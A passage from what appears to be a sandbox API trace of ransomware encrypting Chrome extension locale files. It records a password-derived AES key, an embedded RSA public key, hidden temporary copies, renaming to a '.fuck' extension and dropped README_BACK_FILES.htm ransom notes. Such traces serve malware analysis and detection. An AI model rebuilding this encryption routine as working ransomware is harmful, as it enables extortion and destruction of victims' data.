lpFindFileData=0x2b9d0e4) returned 1 [0250.338] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ce0 [0250.344] FindNextFileA (in: hFindFile=0x2985ce0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.344] FindNextFileA (in: hFindFile=0x2985ce0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.344] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.344] GetLastError () returned 0x0 [0250.344] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json")) returned 0x20 [0250.344] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json", dwFileAttributes=0x80) returned 1 [0250.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.346] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.346] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.349] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.349] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.349] CryptHashData (hHash=0x2985e60, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.349] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985e60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ea0) returned 1 [0250.349] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.349] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.349] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2938e38) returned 1 [0250.350] CryptImportPublicKeyInfo (in: hCryptProv=0x2938e38, dwCertEncodingType=0x1, pInfo=0x2934f60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934f90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934f98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985b20) returned 1 [0250.350] CryptEncrypt (in: hKey=0x2985b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.350] CryptEncrypt (in: hKey=0x2985b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2938d28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2938d28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.350] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2938d28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2938d28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.352] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x116, lpOverlapped=0x0) returned 1 [0250.354] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x116, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.354] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.354] CloseHandle (hObject=0x5d58) returned 1 [0250.355] CloseHandle (hObject=0x5d5c) returned 1 [0250.355] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), bFailIfExists=0) returned 1 [0250.359] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json", dwFileAttributes=0x0) returned 1 [0250.359] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.gsg")) returned 1 [0250.364] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.fuck")) returned 1 [0250.365] CryptDestroyHash (hHash=0x2985e60) returned 1 [0250.365] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0250.366] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.366] FindNextFileA (in: hFindFile=0x2985ce0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.366] FindClose (in: hFindFile=0x2985ce0 | out: hFindFile=0x2985ce0) returned 1 [0250.366] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\readme_back_files.htm")) returned 0xffffffff [0250.366] AreFileApisANSI () returned 1 [0250.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.366] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.367] GetFileType (hFile=0x5d54) returned 0x1 [0250.367] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.368] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.368] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29858a0 [0250.368] FindNextFileA (in: hFindFile=0x29858a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.368] FindNextFileA (in: hFindFile=0x29858a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.369] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.369] GetLastError () returned 0x0 [0250.369] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json")) returned 0x20 [0250.369] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0250.369] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.371] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.372] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.373] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.375] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.375] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.375] CryptHashData (hHash=0x2985ee0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.375] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985ee0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985a60) returned 1 [0250.375] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.375] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.375] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2938db0) returned 1 [0250.376] CryptImportPublicKeyInfo (in: hCryptProv=0x2938db0, dwCertEncodingType=0x1, pInfo=0x2934260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934298*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985b60) returned 1 [0250.376] CryptEncrypt (in: hKey=0x2985b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.376] CryptEncrypt (in: hKey=0x2985b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2938ec0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2938ec0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.376] WriteFile (in: hFile=0x5d58, lpBuffer=0x2938ec0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2938ec0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.377] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x159, lpOverlapped=0x0) returned 1 [0250.379] CryptEncrypt (in: hKey=0x2985a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x159, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x160) returned 1 [0250.379] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x160, lpOverlapped=0x0) returned 1 [0250.379] CloseHandle (hObject=0x5d5c) returned 1 [0250.379] CloseHandle (hObject=0x5d58) returned 1 [0250.379] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0250.383] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0250.384] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0250.385] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0250.386] CryptDestroyHash (hHash=0x2985ee0) returned 1 [0250.386] CryptDestroyKey (hKey=0x2985a60) returned 1 [0250.386] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.387] FindNextFileA (in: hFindFile=0x29858a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.387] FindClose (in: hFindFile=0x29858a0 | out: hFindFile=0x29858a0) returned 1 [0250.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0250.387] AreFileApisANSI () returned 1 [0250.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.387] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.388] GetFileType (hFile=0x5d54) returned 0x1 [0250.388] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.389] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.389] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985e20 [0250.390] FindNextFileA (in: hFindFile=0x2985e20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.390] FindNextFileA (in: hFindFile=0x2985e20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.390] GetLastError () returned 0x0 [0250.390] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json")) returned 0x20 [0250.390] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0250.391] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.391] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.392] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.392] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.394] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.394] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.394] CryptHashData (hHash=0x2985f20, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.394] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985f20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985860) returned 1 [0250.394] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.395] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, 